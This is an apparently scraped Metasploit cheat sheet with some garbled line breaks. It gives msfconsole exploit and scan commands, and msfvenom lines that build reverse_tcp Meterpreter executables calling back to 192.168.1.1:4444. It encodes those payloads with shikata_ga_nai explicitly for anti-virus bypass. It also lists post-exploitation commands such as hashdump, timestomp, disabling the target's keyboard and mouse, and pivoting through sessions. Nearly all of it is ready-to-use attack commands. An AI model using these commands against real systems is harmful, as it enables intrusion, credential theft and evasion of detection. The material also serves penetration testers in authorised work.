Metasploit Project is a computer security project which provide information about vulnerabilities. Help in the development of penetration tests and IDS signatures, metasploit is very popular tool used by pentest experts.
msf > search [regex]
msf > use exploit/[ExploitPath]
msf > set PAYLOAD [PayloadPath]
msf > show options
msf > set [Option] [Value]
msf > exploit
msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS 192.168.10.0/24
msf > run
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run
msf > use auxiliary/server/socks4
msf > run
msfvenom this is tool can be used to generate Metasploit payloads as standalone files and optionally encode them. This tool replaces msfpayload
and msfencode
tools. Run with ‘’-l payloads’ to get a list of payloads.
$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=192.168.1.1
LPORT=4444 > met.exe
-exe
– Executable-pl
– Perl-rb
– Ruby-raw
– Raw shellcode-c
– C codemsfvenom can be used to apply a level of encoding for anti-virus bypass. For example run msfvenom with -l encoders
to get a list of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f
[FormatType] -i [EncodeInterations]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]
$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=192.168.1.1 LPORT=4444 > mal.exe
? / help
: Display a summary of commands exit / quit: Exit the Meterpreter session
sysinfo
: Show the system name and OS type
shutdown / reboot
: Self-explanatory
cd
: Change directory
lcd
: Change directory on local (attacker’s) machine
pwd / getwd
: Display current working directory
ls
: Show the contents of the directory
cat
: Display the contents of a file on screen
download / upload
: Move files to/from the target machine
mkdir / rmdir
: Make / remove directory
edit
: Open a file in the default editor (typically vi)
getpid
: Display the process ID that Meterpreter is running inside.
getuid
: Display the user ID that Meterpreter is running with.
ps
: Display process list.
kill
: Terminate a process given its process ID.
execute
: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate
: Jump to a given destination process ID
ipconfig
: Show network interface information
portfwd
: Forward packets through TCP session
route
: Manage/view the system’s routing table
idletime
: Display the duration that the GUI of thetarget machine has been idle.
uictl [enable/disable] [keyboard/mouse]
: Enable/disable either the mouse or keyboard of the target machine.
screenshot
: Save as an image a screenshot of the target machine.
use [module]
: Load the specified module
Examples:
use priv
: Load the priv module
hashdump
: Dump the hashes from the box
timestomp
: Alter NTFS file timestamps
msf > exploit -z
msf > exploit –j
exploit listeners
:msf > jobs –l
msf > jobs –k [JobID]
msf > sessions -l
msf > session -i [SessionID]
meterpreter > <Ctrl+Z>
or
meterpreter > background
All modules against the target subnet mask will be pivoted through this session.
msf > route add [Subnet to Route To]
[Subnet Netmask] [SessionID]